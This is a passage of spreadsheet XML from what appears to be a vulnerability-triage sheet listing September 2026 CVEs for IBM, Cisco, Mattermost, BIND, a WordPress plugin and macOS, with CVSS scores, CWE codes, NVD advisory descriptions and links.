      <c r="P869" s="5" t="inlineStr"/>
      <c r="Q869" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R869" s="5" t="inlineStr">
        <is>
          <t>IBM Cloud Pak for Business Automation could allow an authenticated user to cause a denial of service due to uncontrolled resource consumption.</t>
        </is>
      </c>
      <c r="S869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12759</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12765</t>
        </is>
      </c>
      <c r="D870" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E870" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F870" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G870" s="5" t="inlineStr"/>
      <c r="H870" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I870" s="5" t="inlineStr"/>
      <c r="J870" s="5" t="inlineStr"/>
      <c r="K870" s="5" t="inlineStr"/>
      <c r="L870" s="5" t="inlineStr"/>
      <c r="M870" s="5" t="inlineStr"/>
      <c r="N870" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O870" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P870" s="5" t="inlineStr"/>
      <c r="Q870" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R870" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 is vulnerable to server-side request forgery (SSRF). This may allow an unauthenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.</t>
        </is>
      </c>
      <c r="S870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12765</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12767</t>
        </is>
      </c>
      <c r="D871" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E871" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F871" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G871" s="5" t="inlineStr"/>
      <c r="H871" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I871" s="5" t="inlineStr"/>
      <c r="J871" s="5" t="inlineStr"/>
      <c r="K871" s="5" t="inlineStr"/>
      <c r="L871" s="5" t="inlineStr"/>
      <c r="M871" s="5" t="inlineStr"/>
      <c r="N871" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O871" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P871" s="5" t="inlineStr"/>
      <c r="Q871" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R871" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 is vulnerable to server-side request forgery (SSRF). This may allow an unauthenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.</t>
        </is>
      </c>
      <c r="S871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12767</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15396</t>
        </is>
      </c>
      <c r="D872" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E872" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F872" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G872" s="5" t="inlineStr"/>
      <c r="H872" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I872" s="5" t="inlineStr"/>
      <c r="J872" s="5" t="inlineStr"/>
      <c r="K872" s="5" t="inlineStr"/>
      <c r="L872" s="5" t="inlineStr"/>
      <c r="M872" s="5" t="inlineStr"/>
      <c r="N872" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O872" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P872" s="5" t="inlineStr"/>
      <c r="Q872" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R872" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 and IBM WebSphere Application Server - Liberty are vulnerable to HTTP request smuggling, caused by improper parsing of the HTTP transfer-encoding request header. By sending a specially crafted HTTP transfer-encoding request header, an attacker could exploit this vulnerability to poison the web cache, bypass web application firewall protection, and conduct XSS attacks.</t>
        </is>
      </c>
      <c r="S872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15396</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15412</t>
        </is>
      </c>
      <c r="D873" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E873" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F873" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G873" s="5" t="inlineStr"/>
      <c r="H873" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I873" s="5" t="inlineStr"/>
      <c r="J873" s="5" t="inlineStr"/>
      <c r="K873" s="5" t="inlineStr"/>
      <c r="L873" s="5" t="inlineStr"/>
      <c r="M873" s="5" t="inlineStr"/>
      <c r="N873" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O873" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P873" s="5" t="inlineStr"/>
      <c r="Q873" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R873" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 and IBM WebSphere Application Server - Liberty could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim.</t>
        </is>
      </c>
      <c r="S873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15412</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15634</t>
        </is>
      </c>
      <c r="D874" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E874" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F874" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G874" s="5" t="inlineStr"/>
      <c r="H874" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I874" s="5" t="inlineStr"/>
      <c r="J874" s="5" t="inlineStr"/>
      <c r="K874" s="5" t="inlineStr"/>
      <c r="L874" s="5" t="inlineStr"/>
      <c r="M874" s="5" t="inlineStr"/>
      <c r="N874" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O874" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P874" s="5" t="inlineStr"/>
      <c r="Q874" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R874" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 and IBM WebSphere Application Server - Liberty are vulnerable to HTTP request smuggling, caused by improper parsing of the HTTP transfer-encoding request header. By sending a specially crafted HTTP transfer-encoding request header, an attacker could exploit this vulnerability to poison the web cache, bypass web application firewall protection, and conduct XSS attacks.</t>
        </is>
      </c>
      <c r="S874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15634</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15814</t>
        </is>
      </c>
      <c r="D875" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E875" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F875" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G875" s="5" t="inlineStr"/>
      <c r="H875" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I875" s="5" t="inlineStr"/>
      <c r="J875" s="5" t="inlineStr"/>
      <c r="K875" s="5" t="inlineStr"/>
      <c r="L875" s="5" t="inlineStr"/>
      <c r="M875" s="5" t="inlineStr"/>
      <c r="N875" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O875" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P875" s="5" t="inlineStr"/>
      <c r="Q875" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R875" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to limit the amount of memory allocated when decoding uploaded image files which allows an authenticated user to cause excessive server memory consumption and potential denial of service via uploading a specially crafted image as a profile picture, channel file attachment, team icon, or custom brand image. Mattermost Advisory ID: MMSA-2026-00719</t>
        </is>
      </c>
      <c r="S875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15814</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16187</t>
        </is>
      </c>
      <c r="D876" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E876" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F876" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G876" s="5" t="inlineStr"/>
      <c r="H876" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I876" s="5" t="inlineStr"/>
      <c r="J876" s="5" t="inlineStr"/>
      <c r="K876" s="5" t="inlineStr"/>
      <c r="L876" s="5" t="inlineStr"/>
      <c r="M876" s="5" t="inlineStr"/>
      <c r="N876" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O876" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P876" s="5" t="inlineStr"/>
      <c r="Q876" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R876" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 could allow a remote attacker to bypass authentication and obtain sensitive information by sending a crafted unauthenticated request.</t>
        </is>
      </c>
      <c r="S876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16187</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16588</t>
        </is>
      </c>
      <c r="D877" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E877" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F877" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G877" s="5" t="inlineStr"/>
      <c r="H877" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I877" s="5" t="inlineStr"/>
      <c r="J877" s="5" t="inlineStr"/>
      <c r="K877" s="5" t="inlineStr"/>
      <c r="L877" s="5" t="inlineStr"/>
      <c r="M877" s="5" t="inlineStr"/>
      <c r="N877" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O877" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P877" s="5" t="inlineStr"/>
      <c r="Q877" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R877" s="5" t="inlineStr">
        <is>
          <t>The WP Directory Kit plugin for WordPress is vulnerable to blind SQL Injection via the 'order_by' parameter in all versions up to, and including, 1.5.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="S877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16588</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16702</t>
        </is>
      </c>
      <c r="D878" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E878" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F878" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G878" s="5" t="inlineStr"/>
      <c r="H878" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I878" s="5" t="inlineStr"/>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr"/>
      <c r="L878" s="5" t="inlineStr"/>
      <c r="M878" s="5" t="inlineStr"/>
      <c r="N878" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O878" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P878" s="5" t="inlineStr"/>
      <c r="Q878" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R878" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.5 for Linux, UNIX and Windows (includes DB2 Connect Server) could allow a remote authenticated attacker to cause a denial of service due to a null pointer dereference.</t>
        </is>
      </c>
      <c r="S878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16702</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17463</t>
        </is>
      </c>
      <c r="D879" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E879" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F879" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G879" s="5" t="inlineStr"/>
      <c r="H879" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I879" s="5" t="inlineStr"/>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr"/>
      <c r="L879" s="5" t="inlineStr"/>
      <c r="M879" s="5" t="inlineStr"/>
      <c r="N879" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O879" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P879" s="5" t="inlineStr"/>
      <c r="Q879" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R879" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.5 for Linux, UNIX and Windows (includes DB2 Connect Server) could allow a remote authenticated attacker to cause a denial of service due to uncontrolled resource consumption.</t>
        </is>
      </c>
      <c r="S879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17463</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19033</t>
        </is>
      </c>
      <c r="D880" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E880" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F880" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G880" s="5" t="inlineStr"/>
      <c r="H880" s="5" t="inlineStr"/>
      <c r="I880" s="5" t="inlineStr"/>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr"/>
      <c r="L880" s="5" t="inlineStr"/>
      <c r="M880" s="5" t="inlineStr"/>
      <c r="N880" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O880" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P880" s="5" t="inlineStr"/>
      <c r="Q880" s="5" t="inlineStr">
        <is>
          <t>CWE-349</t>
        </is>
      </c>
      <c r="R880" s="5" t="inlineStr">
        <is>
          <t>For a secondary zone with transfers restricted by TSIG, `named` may start to serve the data provided in a zone transfer before the final message with the TSIG signature arrives. This could allow an attacker that does not actually possess a valid TSIG signature to send unauthorized zone contents to a secondary server. Although no TSIG signature ever arrives, `named` does not rollback to the pre-transfer state. To exploit the vulnerability, the transfer must be a multi-message TCP IXFR, as described by RFC 8945.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19033</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20283</t>
        </is>
      </c>
      <c r="D881" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E881" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F881" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G881" s="5" t="inlineStr"/>
      <c r="H881" s="5" t="inlineStr"/>
      <c r="I881" s="5" t="inlineStr"/>
      <c r="J881" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K881" s="5" t="inlineStr"/>
      <c r="L881" s="5" t="inlineStr"/>
      <c r="M881" s="5" t="inlineStr"/>
      <c r="N881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O881" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P881" s="5" t="inlineStr"/>
      <c r="Q881" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R881" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the IPsec Open API endpoint of Cisco ISE could allow an authenticated, remote attacker to inject arbitrary commands on the underlying operating system.&amp;nbsp;
This vulnerability is due to insufficient validation of user-supplied input in IPsec Open API calls. An attacker could exploit this vulnerability by sending crafted input to the IPsec Open API endpoint on an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system.&amp;nbsp;
To exploit this vulnerability, the attacker must have valid administrative credentials and the node must have more than one network interface, one of which must be configured as an active IPsec tunnel.
Note: For CVE-2026-20283, Cisco has assigned a Security Impact Rating (SIR) of High rather than Medium as the score indicates. The reason is that it is easy to get to root from the achieved privilege level.</t>
        </is>
      </c>
      <c r="S881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20283</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20287</t>
        </is>
      </c>
      <c r="D882" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E882" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F882" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G882" s="5" t="inlineStr"/>
      <c r="H882" s="5" t="inlineStr"/>
      <c r="I882" s="5" t="inlineStr"/>
      <c r="J882" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K882" s="5" t="inlineStr"/>
      <c r="L882" s="5" t="inlineStr"/>
      <c r="M882" s="5" t="inlineStr"/>
      <c r="N882" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O882" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P882" s="5" t="inlineStr"/>
      <c r="Q882" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R882" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20287 are related to improper privilege managment issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-269.</t>
        </is>
      </c>
      <c r="S882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20287</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27553</t>
        </is>
      </c>
      <c r="D883" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E883" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F883" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G883" s="5" t="inlineStr"/>
      <c r="H883" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I883" s="5" t="inlineStr"/>
      <c r="J883" s="5" t="inlineStr"/>
      <c r="K883" s="5" t="inlineStr"/>
      <c r="L883" s="5" t="inlineStr"/>
      <c r="M883" s="5" t="inlineStr"/>
      <c r="N883" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O883" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P883" s="5" t="inlineStr"/>
      <c r="Q883" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R883" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can manipulate the schema path parameter in the /index.php/diagnostics_tab/ajax_diag_table_rows endpoint using a valid user cookie allowing disclosure of all user password hashes.</t>
        </is>
      </c>
      <c r="S883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27553</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43791</t>
        </is>
      </c>
      <c r="D884" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E884" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G884" s="5" t="inlineStr"/>
      <c r="H884" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I884" s="5" t="inlineStr"/>
      <c r="J884" s="5" t="inlineStr"/>
      <c r="K884" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L884" s="5" t="inlineStr"/>
      <c r="M884" s="5" t="inlineStr"/>
      <c r="N884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O884" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P884" s="5" t="inlineStr"/>
      <c r="Q884" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R884" s="5" t="inlineStr">
        <is>
          <t>A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to read arbitrary files.</t>
        </is>
      </c>
      <c r="S884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43791</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5132</t>
        </is>
      </c>
      <c r="D885" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E885" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F885" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G885" s="5" t="inlineStr"/>
      <c r="H885" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I885" s="5" t="inlineStr"/>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr"/>
      <c r="L885" s="5" t="inlineStr"/>
      <c r="M885" s="5" t="inlineStr"/>
      <c r="N885" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O885" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P885" s="5" t="inlineStr"/>
      <c r="Q885" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R885" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to limit size of unpacked SDP messages compressed with zlib, which allows attacker to deny service or crash server via sending many SDP messages that unpack to large size.. Mattermost Advisory ID: MMSA-2026-00643</t>
        </is>
      </c>
      <c r="S885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5132</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53716</t>
        </is>
      </c>
